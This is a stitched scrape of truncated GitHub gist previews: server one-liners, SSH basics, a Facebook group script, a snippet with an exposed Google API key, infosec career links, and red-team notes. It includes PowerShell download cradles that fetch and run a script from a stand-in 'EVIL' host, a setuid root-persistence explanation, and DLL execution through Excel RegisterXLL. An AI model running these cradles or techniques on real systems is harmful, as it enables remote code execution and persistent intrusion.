willurd

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000

dergachev

Why You Can't Un-Root a Compromised Machine

Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.

While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job. I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account from the system (including www-data, which you might not even know if compromised).

If the "setuid bit" (or flag, or permission mode) is set for executable, the operating system will run not as the cur

learncodeacademy

###SSH into a remote machine###

ssh user@mydomain.com
#or by ip address
ssh user@192.168.1.1

exit: exit ###Install Something###

#If it's a new server, update apt-get first thing

HarmJ0y

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

AaronRM

var deleteAllGroupMembers = (function () {
    var deleteAllGroupMembers = {};
    // the facebook ids of the users that will not be removed.
    // IMPORTANT: add your own facebook id here so that the script will not remove yourself!
    var excludedFbIds = ['1234','11223344']; // make sure each id is a string!
    var usersToDeleteQueue = [];
    var scriptEnabled = false;
    var processing = false;
 
    deleteAllGroupMembers.start = function() {

mpj

const fetch = require('node-fetch')
const Bacon = require('baconjs')

function getInPortuguese(word) {
  // Google Translate API is a paid (but dirt cheap) service. This is my key
  // and will be disabled by the time the video is out. To generate your own,
  // go here: https://cloud.google.com/translate/v2/getting_started
  const apiKey =
    'AIzaSyB4DyRHIsNhogQXmH16YKbZfR-lTXrQpq0'
	const url =

coldfusion39

#!/usr/bin/env python
# Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#

mubix

• How to Build a Successful Information Security Career (Daniel Miessler)
  • https://danielmiessler.com/blog/build-successful-infosec-career/#gs.DtVCbbw
• The First Steps to a Career in Information Security (Errata Security - Marisa Fagan)
  • http://blog.erratasec.com/2010/04/first-steps-to-career-in-information.html#.WFrbofkrIuU
• Hiring your first Security Professional (Peerlyst - Dawid Balut)
  • https://www.peerlyst.com/posts/hiring-your-first-security-professional-dawid-balut
• How to Start a Career in Cyber security
  • https://www.concise-courses.com/security/how-to-start-your-career/
• How to Get Into Information Security (ISC^2)
• https://www.isc2.org/how-to-get-into-information-security.aspx

secretGeek

void Main()
{
   //testGenerating();
   var grid = goodGrid();
   //grid.Write().Dump();
   grid.MakeGame();
   //grid.Write().Dump();
   var foundOne = false;
   var game = grid.Write();
   while(!foundOne) 

ryhanson

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc